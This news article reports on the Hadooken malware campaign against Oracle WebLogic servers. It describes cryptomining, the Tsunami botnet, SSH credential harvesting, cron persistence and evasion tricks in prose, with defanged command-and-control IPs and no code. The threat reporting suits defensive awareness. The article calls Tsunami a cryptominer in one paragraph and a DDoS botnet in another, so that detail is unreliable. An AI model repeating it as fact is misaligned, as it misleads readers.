New Malware Campaign Targets Linux Servers for Cryptocurrency Mining
Recent discoveries by cybersecurity researchers have unveiled a new malware operation specifically designed to target Linux environments for illicit cryptocurrency mining and the deployment of botnet malware. This campaign notably focuses on the Oracle WebLogic server, aiming to distribute a malware variant identified as Hadooken, as reported by cloud security firm Aqua.
According to security researcher Assaf Moran, the deployment of Hadooken triggers the installation of Tsunami malware, which functions as a cryptocurrency miner. The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to secure an initial foothold and execute arbitrary code in vulnerable instances.
The assault utilizes two nearly identical payloads, one created in Python and the other as a shell script. Both are tasked with retrieving the Hadooken malware from remote servers (notably identified by the IP addresses 89.185.85[.]102 and 185.174.136[.]204). Additionally, the shell script version collects information from various directories containing SSH data, such as user credentials and host information, which it subsequently harnesses to compromise known servers.
The malware operates by advancing laterally across the network or interconnected environments to further proliferate the Hadooken strain. Notably, Hadooken embeds two principal components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet known as Tsunami, previously associated with targeting Jenkins and Weblogic services within Kubernetes clusters.
Furthermore, Hadooken ensures persistence on the host system by establishing cron jobs that regularly execute the crypto miner at varying intervals. Its evasion tactics include the use of Base64-encoded payloads, renaming payloads to common process names like "bash" and "java" to blend with legitimate software, and deleting artifacts post-execution to obscure any trace of malicious activity.
Aqua’s analysis indicates that the IP address associated with one of the key command-and-control servers (89.185.85[.]102) is registered in Germany under Aeza International LTD, a provider with previous ties to cryptocurrency campaigns exploiting vulnerabilities within Apache Log4j and Atlassian Confluence. The second IP, 185.174.136[.]204, though currently inactive, is similarly linked to Aeza Group Ltd. Reports suggest that Aeza operates in volatile areas such as Moscow while providing services typically favored by cybercriminals for their robustness against law enforcement.
The modus operandi employed by Aeza and its rapid expansion can be attributed to the engagement of young developers linked to bulletproof hosting providers in Russia, who facilitate a safe harbor for cybercriminal activities.
It is essential for businesses using Linux environments, particularly those utilizing Oracle WebLogic servers, to implement robust security measures against such sophisticated attacks. Relevant tactics from the MITRE ATT&CK framework associated with this incident may include initial access through exploitation of known vulnerabilities, lateral movement across the network, and persistence via scheduled tasks, underscoring the need for vigilance in cybersecurity protocols.
Keeping abreast of such threats is imperative for business owners dedicated to safeguarding their digital infrastructures. Regular assessments of system configurations and user credential policies can substantially reduce the risk of compromise.
Source Link : https://thehackernews.com/2024/09/new-linux-malware-campaign-exploits.html
